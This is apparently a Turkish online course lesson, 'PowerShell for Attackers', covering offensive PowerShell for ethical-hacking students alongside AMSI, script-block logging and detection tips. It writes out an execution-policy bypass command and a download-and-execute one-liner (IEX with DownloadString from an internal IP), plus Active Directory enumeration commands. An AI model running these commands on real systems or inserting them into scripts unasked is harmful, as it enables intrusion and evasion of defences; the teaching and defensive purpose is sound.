Saldırganlar için PowerShell
Saldırı amaçlı PowerShell
Saldırganlar için PowerShell, CoddyKit'te ücretsiz bir Ethical Hacking Academy dersidir. Bu, 4 dersinin 4. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Ethical Hacking Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.
PowerShell Neden Kullanılır
PowerShell Windows'a yerleşiktir; OS ve .NET ile derinlemesine bütünleşmiştir ve yöneticiler tarafından güvenilir. Bu nedenle saldırganların sevdiği bir living-off-the-land aracı olmuştur; diske bırakılacak kötü amaçlı yazılım gerekmez.
Bu derste Windows'a saldırmak ve onu savunmak için anlamanız gereken saldırı amaçlı PowerShell kavramları ele alınır.
Komutlar ve İşlem Hattı
PowerShell komutları, Fiil-İsim biçimindeki cmdlet'lerdir. Yalnızca metin değil, zengin nesneler aktarırlar; bu nesneler işlem hattından geçirilerek numaralandırmayı güçlü hâle getirir.
Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, IdSistem Numaralandırması
Saldırganlar bir ana bilgisayarı; kullanıcıları, hizmetleri, ağı ve yamaları hızla incelemek için yerleşik komutları kullanır.
Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State ListenÇalıştırma İlkesi Güvenlik Değildir
Çalıştırma ilkesi, betik dosyalarının çalıştırılmasını kısıtlar; ancak bir güvenlik sınırı değildir. Birçok basit seçenek bu kısıtlamayı aşar, bu nedenle savunmacılar buna güvenmemelidir.
powershell -ExecutionPolicy Bypass -File script.ps1İndirme ve Çalıştırma
Yaygın bir teknik, bir yükü alıp bellekte çalıştırır ve diskte çok az iz bırakır. Ağ ve AMSI izlemesinin önemli olmasının nedeni budur.
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')Kodlanmış Komutlar
-EncodedCommand seçeneği, Base64 ile kodlanmış PowerShell'i çalıştırır. Bu seçenek çoğunlukla amacı yüzeysel incelemeden ve basit filtrelerden gizlemek için kullanılır.
Savunmacılar gerçekte ne çalıştırıldığını ortaya çıkarmak için bunların kodunu günlüklerden çözer.
powershell -EncodedCommand <base64-here>Saldırı Amaçlı Çerçeveler
Olgun araç setleri bu temel yapı taşları üzerine kuruludur:
- PowerSploit / PowerView - AD numaralandırması ve istismar sonrası işlemler.
- Empire / Covenant - komuta ve kontrol.
- Nishang - saldırı amaçlı betikler.
Çoğu artık savunma sistemleri tarafından yoğun biçimde imzalarla tanınır.
Active Directory Keşfi
Bir etki alanında PowerShell (PowerView veya AD modülü), kullanıcıları, grupları ve güven ilişkilerini haritalar. Bu, Domain Admin'e giden yolu bulmanın temelidir.
Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'AMSI ve Günlükleme
Microsoft, PowerShell'in kötüye kullanılmasına özel savunmalar eklemiştir:
- AMSI (Kötü Amaçlı Yazılımdan Koruma Tarama Arayüzü), betik içeriğini çalıştırılmadan önce tarar.
- Betik Bloğu Günlüklemesi, çalıştırılanları kaydeder.
- Kısıtlanmış Dil Kipi, tehlikeli özellikleri sınırlar.
Saldırganlar AMSI'yi aşmaya çalışır; savunmacılar günlükleri izler.
Savunma Amaçlı Avcılık
Mavi ekipler kötü amaçlı PowerShell'i şu belirtileri arayarak tespit eder:
- Kodlanmış veya gizlenmiş komutlar.
DownloadString/IEXağ üzerinden indirmeleri.- Olağandışı üst süreçler (Office'in PowerShell'i başlatması).
- AMSI ve Olay ID'si 4104 betik bloğu günlükleri.
Etik Kullanın
Bu teknikler güçlüdür ve gerçek saldırılarla doğrudan örtüşür. Bunları yalnızca kendi laboratuvarınızda veya açık yazılı yetkilendirmeyle çalıştırın.
Savunma tarafında pratik yapmak; günlükleri okumak ve AMSI tespitlerini fark etmek, saldırı tarafı kadar değerlidir.
Hızlı Denetim
Çalıştırma ilkesini bir denetim mekanizması olarak değerlendirin.
Özet
Saldırı amaçlı PowerShell'i incelediniz:
- Nesne tabanlı cmdlet'ler numaralandırmayı güçlü ve gizli hâle getirir (living-off-the-land).
- İndirme ve çalıştırma, kodlanmış komutlar ve PowerView/Empire gibi çerçeveler.
- Çalıştırma ilkesi güvenlik değildir; gerçek savunmalar AMSI ve betik bloğu günlüklemesidir.
- Her zaman etik davranın ve savunma tarafını da inceleyin.
Windows İç Yapıları kursu burada tamamlanır.
Yapay zeka eğitmeniyle Ethical Hacking Academy öğren — ücretsiz
Tarayıcında gerçek kod yaz ve çalıştır, 7/24 yapay zeka eğitmeninden anında yardım al; web'de ya da uygulamada kaldığın yerden devam et.
- Kurslar
- 31
- Dersler
- 111
Sıkça Sorulan Sorular
“Saldırganlar için PowerShell” dersi ücretsiz mi?
Evet — “Saldırganlar için PowerShell” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Ethical Hacking Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.
“Saldırganlar için PowerShell” dersinde ne öğreneceğim?
Saldırı amaçlı PowerShell Ethical Hacking Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Ethical Hacking Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Ethical Hacking Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 4. dersidir.
“Saldırganlar için PowerShell” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Ethical Hacking Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Ethical Hacking Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Windows Mimarisi
- Kayıt Defteri
- Windows Kimlik Doğrulaması
- Saldırganlar için PowerShell